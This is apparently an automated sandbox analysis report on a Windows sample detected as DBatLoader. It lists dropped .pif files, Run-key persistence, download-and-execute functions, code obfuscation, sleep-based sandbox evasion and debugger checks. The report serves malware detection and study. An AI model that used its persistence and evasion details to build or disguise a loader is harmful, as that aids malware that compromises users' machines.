Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: jW3NEKvxH1.exe Static file information: File size 1285120 > 1048576
Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdb source: jW3NEKvxH1.exe, jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A86000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A3E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A6E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2146235666.000000007F920000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2145769596.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2266110150.0000000002366000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000004.00000003.2245097882.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000009.00000000.2272956424.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 0000000A.00000000.2294839083.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 0000000B.00000002.2390955236.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 00000011.00000002.2395576863.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 00000012.00000000.2403173477.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 00000014.00000000.2410473637.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif.4.dr
Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000008.00000003.2265634215.00000000055D0000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 0000000C.00000002.2390214130.0000000000841000.00000020.00000001.01000000.00000008.sdmp, xpha.pif.8.dr
Source: Binary string: easinvoker.pdbH source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdbGCTL source: jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A86000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A3E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A6E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2146235666.000000007F920000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2249226014.0000000021B2D000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2249226014.0000000021B5E000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2266672340.000000000282C000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2145769596.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2145952303.000000000282E000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2266110150.0000000002366000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdb source: alpha.pif, alpha.pif, 0000000B.00000002.2390955236.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 00000011.00000002.2395576863.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 00000012.00000000.2403173477.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 00000014.00000000.2410473637.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif.4.dr
Source: Binary string: ping.pdb source: esentutl.exe, 00000008.00000003.2265634215.00000000055D0000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, xpha.pif, 0000000C.00000002.2390214130.0000000000841000.00000020.00000001.01000000.00000008.sdmp, xpha.pif.8.dr

Data Obfuscation
barindex
Yara detected DBatLoader
Source: Yara match File source: 0.2.jW3NEKvxH1.exe.2d30000.2.unpack, type: UNPACKEDPE
Binary contains a suspicious time stamp
Source: alpha.pif.4.dr Static PE information: 0xF8D87E17 [Thu Apr 20 00:53:43 2102 UTC]
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D4894C LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_02D4894C
PE file contains sections with non-standard names
Source: alpha.pif.4.dr Static PE information: section name: .didat
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D363B0 push 02D3640Bh; ret 0_2_02D36403
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D363AE push 02D3640Bh; ret 0_2_02D36403
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D3C349 push 8B02D3C1h; ret 0_2_02D3C34E
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D5C378 push 02D5C56Eh; ret 0_2_02D5C566
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D36782 push 02D367C6h; ret 0_2_02D367BE
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D36784 push 02D367C6h; ret 0_2_02D367BE
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D5C570 push 02D5C56Eh; ret 0_2_02D5C566
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D3C56C push ecx; mov dword ptr [esp], edx 0_2_02D3C571
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D4AADF push 02D4AB18h; ret 0_2_02D4AB10
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D48AD8 push 02D48B10h; ret 0_2_02D48B08
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D4AAE0 push 02D4AB18h; ret 0_2_02D4AB10
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02DA4A50 push eax; ret 0_2_02DA4B20
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D3CBEC push 02D3CD72h; ret 0_2_02D3CD6A
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D4886C push 02D488AEh; ret 0_2_02D488A6
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D3C9DF push 02D3CD72h; ret 0_2_02D3CD6A
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D3C98F push 02D3CD72h; ret 0_2_02D3CD6A
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D46946 push 02D469F3h; ret 0_2_02D469EB
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D46948 push 02D469F3h; ret 0_2_02D469EB
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D42F60 push 02D42FD6h; ret 0_2_02D42FCE
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D5D2FC push 02D5D367h; ret 0_2_02D5D35F
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D3332C push eax; ret 0_2_02D33368
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D5D0AC push 02D5D125h; ret 0_2_02D5D11D
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D4306C push 02D430B9h; ret 0_2_02D430B1
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D4306B push 02D430B9h; ret 0_2_02D430B1
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D5D1F8 push 02D5D288h; ret 0_2_02D5D280
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D5D144 push 02D5D1ECh; ret 0_2_02D5D1E4
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D4F108 push ecx; mov dword ptr [esp], edx 0_2_02D4F10D
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02E0D43F push ecx; ret 0_2_02E0D452
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02DEB586 push ecx; ret 0_2_02DEB599
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D3D5A0 push 02D3D5CCh; ret 0_2_02D3D5C4
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D4790C push 02D47989h; ret 0_2_02D47981

Persistence and Installation Behavior
barindex
Drops PE files with a suspicious file extension
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\xpha.pif Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\Libraries\Dlaybpxl.PIF Jump to dropped file
Contains functionality to download and launch executables
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02926128 ShellExecuteW,URLDownloadToFileW, 6_2_02926128
Drops PE files
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\xpha.pif Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\Libraries\Dlaybpxl.PIF Jump to dropped file
Drops PE files to the user directory
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\xpha.pif Jump to dropped file

Boot Survival
barindex
Drops PE files to the user root directory
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\xpha.pif Jump to dropped file
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02939BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 6_2_02939BC4
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Dlaybpxl Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Dlaybpxl Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D4AB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_02D4AB1C
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Delayed program exit found
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0292E54F Sleep,ExitProcess, 6_2_0292E54F
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_0294E54F Sleep,ExitProcess, 19_2_0294E54F
Contains functionality to enumerate running services
Source: C:\Windows\SysWOW64\SndVol.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 6_2_029398C2
Source: C:\Windows\SysWOW64\SndVol.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 19_2_029598C2
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\SndVol.exe Window / User API: threadDelayed 516 Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe Window / User API: threadDelayed 9477 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Windows\SysWOW64\SndVol.exe API coverage: 8.9 %
Source: C:\Users\Public\alpha.pif API coverage: 6.3 %
Source: C:\Users\Public\alpha.pif API coverage: 7.9 %
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF API coverage: 9.0 %
Source: C:\Windows\SysWOW64\SndVol.exe API coverage: 4.6 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\SndVol.exe TID: 1584 Thread sleep count: 516 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe TID: 1584 Thread sleep time: -1548000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe TID: 1584 Thread sleep count: 9477 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe TID: 1584 Thread sleep time: -28431000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\Public\xpha.pif Last function: Thread delayed
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D35908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 0_2_02D35908
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0292B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 6_2_0292B335
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0293B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose, 6_2_0293B42F
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0296D5E9 FindFirstFileExA, 6_2_0296D5E9
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0292B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 6_2_0292B53A
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02927A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8, 6_2_02927A8C
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02926AC2 FindFirstFileW,FindNextFileW, 6_2_02926AC2
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_029289A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8, 6_2_029289A9
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02938C69 FindFirstFileW,FindNextFileW,FindNextFileW, 6_2_02938C69
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02928DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose, 6_2_02928DA7
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E40207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove, 9_2_00E40207
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E4589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose, 9_2_00E4589A
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E44EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 9_2_00E44EC1
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E53E66 FindFirstFileW,FindNextFileW,FindClose, 9_2_00E53E66
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E3532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose, 9_2_00E3532E
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E4589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose, 11_2_00E4589A
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E40207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove, 11_2_00E40207
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E44EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 11_2_00E44EC1
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E53E66 FindFirstFileW,FindNextFileW,FindClose, 11_2_00E53E66
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E3532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose, 11_2_00E3532E
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_0294B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 19_2_0294B335
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_0295B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose, 19_2_0295B42F
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_0298D5E9 FindFirstFileExA, 19_2_0298D5E9
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_0294B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 19_2_0294B53A
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02947A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8, 19_2_02947A8C
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02946AC2 FindFirstFileW,FindNextFileW, 19_2_02946AC2
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_029489A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8, 19_2_029489A9
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02958C69 FindFirstFileW,FindNextFileW,FindNextFileW, 19_2_02958C69
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02948DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose, 19_2_02948DA7
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02926F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 6_2_02926F06
Source: jW3NEKvxH1.exe, 00000000.00000002.2265349899.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.00000000007E3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: xpha.pif, 0000000C.00000002.2390568725.0000000002E8B000.00000004.00000020.00020000.00000000.sdmp, Dlaybpxl.PIF, 0000000F.00000002.2410857467.00000000006EF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: SndVol.exe, 00000006.00000002.4603655140.0000000000607000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllRR
Source: Dlaybpxl.PIF, 00000017.00000002.2476572161.00000000007E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllvv
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\SndVol.exe API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF API call chain: ExitProcess graph end node

Anti Debugging
barindex
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D4F744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent, 0_2_02D4F744
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Process queried: DebugPort Jump to behavior
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Process queried: DebugPort
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0295A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_0295A65D
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D4894C LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_02D4894C
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02DF9AE4 mov eax, dword ptr fs:[00000030h] 0_2_02DF9AE4
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02962554 mov eax, dword ptr fs:[00000030h] 6_2_02962554
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E5C1FA mov eax, dword ptr fs:[00000030h] 9_2_00E5C1FA
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E5C1FA mov eax, dword ptr fs:[00000030h] 11_2_00E5C1FA
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02982554 mov eax, dword ptr fs:[00000030h] 19_2_02982554
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02930B19 GetNativeSystemInfo,GetProcessHeap,HeapAlloc,SetLastError,SetLastError, 6_2_02930B19
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02954168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_02954168
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0295A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_0295A65D
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02953B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_02953B44
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02953CD7 SetUnhandledExceptionFilter, 6_2_02953CD7
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E46EC0 SetUnhandledExceptionFilter, 9_2_00E46EC0
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E46B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_00E46B40
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E46EC0 SetUnhandledExceptionFilter, 11_2_00E46EC0
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E46B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_00E46B40
Source: C:\Users\Public\xpha.pif Code function: 12_2_00843600 SetUnhandledExceptionFilter, 12_2_00843600
Source: C:\Users\Public\xpha.pif Code function: 12_2_00843470 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_00843470
